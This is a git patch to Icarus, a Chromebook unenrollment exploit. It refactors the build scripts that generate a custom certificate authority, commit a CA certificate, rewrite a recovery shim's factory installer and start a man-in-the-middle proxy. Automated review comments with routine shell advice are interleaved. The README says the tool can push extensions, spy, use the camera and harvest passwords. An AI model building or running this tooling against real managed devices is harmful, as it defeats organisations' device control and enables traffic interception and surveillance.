From 8f088c70864e648f171f949eb93d97d8d7678c7b Mon Sep 17 00:00:00 2001 From: kxtzownsu Date: Sun, 9 Mar 2025 20:16:28 +0000 Subject: [PATCH] refactor --- .gitignore | 1 - .gitmodules | 3 +++ Makefile | 20 +++++++++++++------- README.md | 13 +++++++++---- httpmitm | 1 + modify.sh | 5 +++-- myCA.der | Bin 0 -> 951 bytes scripts/create_out.sh | 20 ++++++++++---------- scripts/venv.sh | 6 +++++- 9 files changed, 44 insertions(+), 25 deletions(-) create mode 160000 httpmitm create mode 100644 myCA.der diff --git a/.gitignore b/.gitignore index 82d1b8f..feab0d7 100644 --- a/.gitignore +++ b/.gitignore @@ -4,6 +4,5 @@ gen original out *pb2.py -myCA.* *.bin *.bin.old diff --git a/.gitmodules b/.gitmodules index e69de29..3b9c408 100644 --- a/.gitmodules +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "httpmitm"] + path = httpmitm + url = https://git.kxtz.dev/kxtzownsu/Icarus-Lite.git diff --git a/Makefile b/Makefile index d0e1153..e7fbeff 100644 --- a/Makefile +++ b/Makefile @@ -1,14 +1,14 @@ venv: - bash venv.sh + bash scripts/venv.sh setup-python: mkdir -p gen/python protoc --python_out=gen/python proto/crs.proto protoc --python_out=gen/python proto/pins.proto - protoc --python_out=gen/python cproto/t.proto - cp gen/python/crs_pb2.py src/root_store_gen - cp gen/python/pins_pb2.py src/root_store_gen - cp gen/python/ct_pb2.py src/root_store_gen + protoc --python_out=gen/python proto/ct.proto + cp gen/python/proto/crs_pb2.py src/root_store_gen + cp gen/python/proto/pins_pb2.py src/root_store_gen + cp gen/python/proto/ct_pb2.py src/root_store_gen exit build-packed-data: 
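Review bot: Removing `myCA.*` from .gitignore un-ignores every file with that stem, not only the `myCA.der` certificate this patch adds (see the diffstat); if `generate_certs.sh`, run by the new `ca-keys` Makefile target, also writes the CA private key under the same stem, that key is now one `git add .` away from being committed. Keep the broad pattern and whitelist only the public artifact: `myCA.*` followed by `!myCA.der`. If the key is written under a different name, that name belongs here instead.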
@@ -16,12 +16,18 @@ build-packed-data: make venv make setup-python +ca-keys: + cd httpmitm; bash generate_certs.sh + clean: rm -rf out/ + rm -rf original/ + rm -rf gen + rm -rf .venv/ + rm -rf src/root_store_gen/*_pb2.py start-server: bash -c "while tmux has-session -t icarus; do tmux kill-session -t icarus; done" echo "set -g mouse on" > ~/.tmux.conf - tmux new -d -s icarus "cd httpmitm; bash start_proxy.sh" - tmux splitw -t icarus -h "cd httpmitm/dmbackend; bash start_server.sh" + tmux new -d -s icarus "cd httpmitm; bash start.sh" tmux a -t icarus diff --git a/README.md b/README.md index 70a9b73..18f8183 100644 --- a/README.md +++ b/README.md @@ -7,24 +7,28 @@ An exploit for Chrome devices which allows people to unenroll devices with devic > ANYTHING GOOGLE CAN REMOTELY PERFORM ON YOUR DEVICE, ICARUS CAN BE USED TO DO. AN EXAMPLE OF THIS IS INSTALL EXTENSIONS, SPY, USE YOUR CAMERA, REMOTE INTO YOUR DEVICE, GET YOUR PASSWORDS, AND MORE.
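Review bot: In the new `ca-keys` recipe, `cd httpmitm; bash generate_certs.sh` keeps going when the `cd` fails (for example an uninitialised submodule, since `httpmitm` becomes one in this patch), so `bash generate_certs.sh` then runs in the repository root with a confusing "No such file" error; the rewritten `tmux new` line in `start-server` has the same shape. Chain the commands instead: `cd httpmitm && bash generate_certs.sh` and `tmux new -d -s icarus "cd httpmitm && bash start.sh"`. The README hunk in this patch drops the `make ca-keys` step while this hunk adds the target, which looks deliberate now that `myCA.der` is committed, but a one-line comment above `ca-keys:` stating when it must be re-run (and that it overwrites the committed CA) would help.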

> ONLY SELF HOST ICARUS, NEVER USE A PUBLIC SERVER! + + ## Setup and installation instructions Clone the repo with ``git clone --recursive https://git.kxtz.dev/kxtzownsu/icarus/` and change directory to it. Set up the environment by running the following commands (Make sure you have python3, python3-venv, and protobuf installed beforehand): -- `make venv` - `make build-packed-data` -- `make ca-keys` Before continuing, open Chrome on your build machine and go to chrome://components. Press CTRL + F and search for "PKIMetadata". Once you find it, press "Check for Updates". Make sure it says up-to-date before continuing (and that the version is below 9999.) -- `bash create_out.sh myCA.der` +- `bash scripts/create_out.sh myCA.der` After doing this the output directory (from here on reffered to as PKIMetadata) will be generated, which is the custom Certificate Authority. Now, to modify the shim with the generated PKIMetadata: -- `bash modify.sh ` +- `sudo bash modify.sh ` Now boot the shim, and Icarus will attempt to modify your stateful partition. @@ -58,6 +62,7 @@ Reboot the device. You'll boot into verified mode. Once you have your server run ## New Credits - [kxtzownsu](https://github.com/kxtzownsu) - rolling ssl keys, maintaining this fork :D +- [cosmicdevv](https://github.com/cosmicdevv) - creating icarus lite ## Original Credits - [MunyDev](https://github.com/MunyDev) - Creating this exploit diff --git a/httpmitm b/httpmitm new file mode 160000 index 0000000..0f4de4c --- /dev/null +++ b/httpmitm @@ -0,0 +1 @@ +Subproject commit 0f4de4c0533f5026ae95e3264d83fe4a13b98a37 diff --git a/modify.sh b/modify.sh index c2c76eb..897c669 100644 --- a/modify.sh +++ b/modify.sh @@ -1,5 +1,5 @@ #!/bin/bash - +SCRIPT_DIR=$(readlink -f "$(dirname "$0")") # Copyright 2019 The ChromiumOS Authors # Use of this source code is governed by a BSD-style license that can be 
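Review bot: The new `SCRIPT_DIR=$(readlink -f "$(dirname "$0")")` line is inserted between the shebang and the ChromiumOS copyright/license header, splitting that header block; moving it below the header keeps the license text contiguous. The resolution itself is fine: `readlink -f` turns a relative `$0` into an absolute directory, which the later `cp "$SCRIPT_DIR/scripts/inshim.sh"` relies on. The rest of the script lies outside this hunk.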
@@ -87,10 +87,11 @@ mkdir -p "$MOUNT_DIR"/usr/bin umount "$MOUNT_DIR" enable_rw_mount "$LOOP_DEV"p3 mount "$LOOP_DEV"p3 "$MOUNT_DIR" -cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" +cp "$SCRIPT_DIR/scripts/inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" chmod +x "$MOUNT_DIR/usr/sbin/factory_install.sh" umount "$MOUNT_DIR" +losetup -D sync sync sync diff --git a/myCA.der b/myCA.der new file mode 100644 index 0000000000000000000000000000000000000000..53e2e1e2403f64e9b6c0e2127dd285e093485519 GIT binary patch literal 951 zcmXqLV%}`f#58*WGZP~dlZX#PeedkjRS7Oz^E!$`I#b_0`1Q?zmyJ`a&7zsAwP$66E5M@XRYoEy_zR zQ3%gWNzW`PRtPAmRPZTDF;p^8fSb$7C?=d;QBsv(o>yGzke-{EnWLASpKBl|&TC|9 zU~FJ%XlZIqgRYixkTrKeMx7?qF%f{~ShxrvdV!Jvtei>Zl`kzvsR@#RG!RSC@7 zr9ywZE}OpCb;X-Kb^4O=O*T5oFCN8RUh>iED?i1v_osg|^6d-aJ&O@nyl9Iz1NC7b+QIrFqRo|96W;d@2q7YIIMc#A8?EcAJzb z=6~uF_!xi5JVi0S}ng#i)wj4p4zsm%}j#vh70?|KaDS*7nH8< zS>Pur%N)GahGP}bGiP@Oh2SbOq=%Kx6fx{ zW@KPo9BdG1APbCnSw0pq7LoYeC;O*7%2{&j&kT!3U2#5*$2%jz2}4$yMZ!R=0lNZz zkbYrC#{Vp=2FySTIoN^e4;bu>3|f-@(tLNjKYTYi9#G$3^ei)Bx=z_{A90C~<-Gr< zM+!}Sym*g2kp z9rIN)=9>$}d(Lc6>N|8#Li%s>#}&)FpNbW$l<__7c``S5+K0?ycb+F7H@$W--mv~v zQT$V#mo`TXW-YH`xwW17tIxqOF>l@iw(n8Ss`;gsXN7!ED%>pLI^6D6&cVF*^p%2h iQ&??`?#|>nYB{ZTLGh8R9UteG=IY(!&3U&h)*S#ue`wbL literal 0 HcmV?d00001 diff --git a/scripts/create_out.sh b/scripts/create_out.sh index b26bd06..37f32c3 100755 --- a/scripts/create_out.sh +++ b/scripts/create_out.sh @@ -18,7 +18,7 @@ echo "using chrome ${CHROME:="google-chrome"}" if [ ! -d "$HOME/.config/$CHROME/PKIMetadata" ] then echo "Opened chrome automatically, make sure you follow the README!" - "$CHROME" chrome://components &> /dev/null & + "$CHROME" chrome://components # &> /dev/null & exit 0 fi HIGHESTVERSIONAPPARENTLY=$(find "$HOME/.config/$CHROME/PKIMetadata/" -maxdepth 1 -mindepth 1 -type d| head -n 1) 
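Review bot: The added `losetup -D` detaches every loop device on the host, not just the one this script attached as `$LOOP_DEV` (the device used by the `enable_rw_mount` and `mount` lines above); on a build machine with other loop-backed mounts that is collateral damage, and it will fail for devices still in use. Detach only this script's device: `losetup -d "$LOOP_DEV"`. The enclosing script, including where `$LOOP_DEV` is set up, starts outside this hunk.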
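Review bot: The rewritten `"$CHROME" chrome://components # &> /dev/null &` now runs Chrome in the foreground with its stdout/stderr on the terminal, and the former redirection survives only as a commented-out tail. If blocking until Chrome exits is the intent (so the following `exit 0` fires only after the user has done the PKIMetadata update), state it in a comment, e.g. `# foreground on purpose: the script exits only once Chrome is closed`; otherwise delete the dead `# &> /dev/null &` rather than keep it. As far as I recall, when a Chrome instance is already running the new process just hands the URL over and returns at once, so the blocking behaviour is not guaranteed either way.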
@@ -38,21 +38,21 @@ rm -rvf original/PKIMetadata/9999/_metadata rm -rvf original/PKIMetadata/9999/manifest.fingerprint # Copy all directories, and will be modified by future calls -rm -rvf "${SCRIPT_DIR}"/out -mkdir "${SCRIPT_DIR}"/out -mkdir -p "${SCRIPT_DIR}"/out/PKIMetadata/. -cp -rvf "${SCRIPT_DIR}"/original/PKIMetadata/9999/. "${SCRIPT_DIR}"/out/PKIMetadata -rm -rvf "${SCRIPT_DIR}"/out/PKIMetadata/_metadata # verified contents not necessary -rm -rvf "${SCRIPT_DIR}out/PKIMetadata/"*.fingerprint -python3 ./src/root_store_gen/generate_new_pbs.py "${SCRIPT_DIR}/original/PKIMetadata/9999/crs.pb" "$@" "${SCRIPT_DIR}/out/PKIMetadata/crs.pb" +rm -rvf "${SCRIPT_DIR}"/../out +mkdir "${SCRIPT_DIR}"/../out +mkdir -p "${SCRIPT_DIR}"/../out/PKIMetadata/. +cp -rvf "${SCRIPT_DIR}"/../original/PKIMetadata/9999/. "${SCRIPT_DIR}"/../out/PKIMetadata +rm -rvf "${SCRIPT_DIR}"/../out/PKIMetadata/_metadata # verified contents not necessary +rm -rvf "${SCRIPT_DIR}/../out/PKIMetadata/"*.fingerprint +python3 ./src/root_store_gen/generate_new_pbs.py "${SCRIPT_DIR}/../original/PKIMetadata/9999/crs.pb" "$@" "${SCRIPT_DIR}/../out/PKIMetadata/crs.pb" # Modify version in manifest python3 <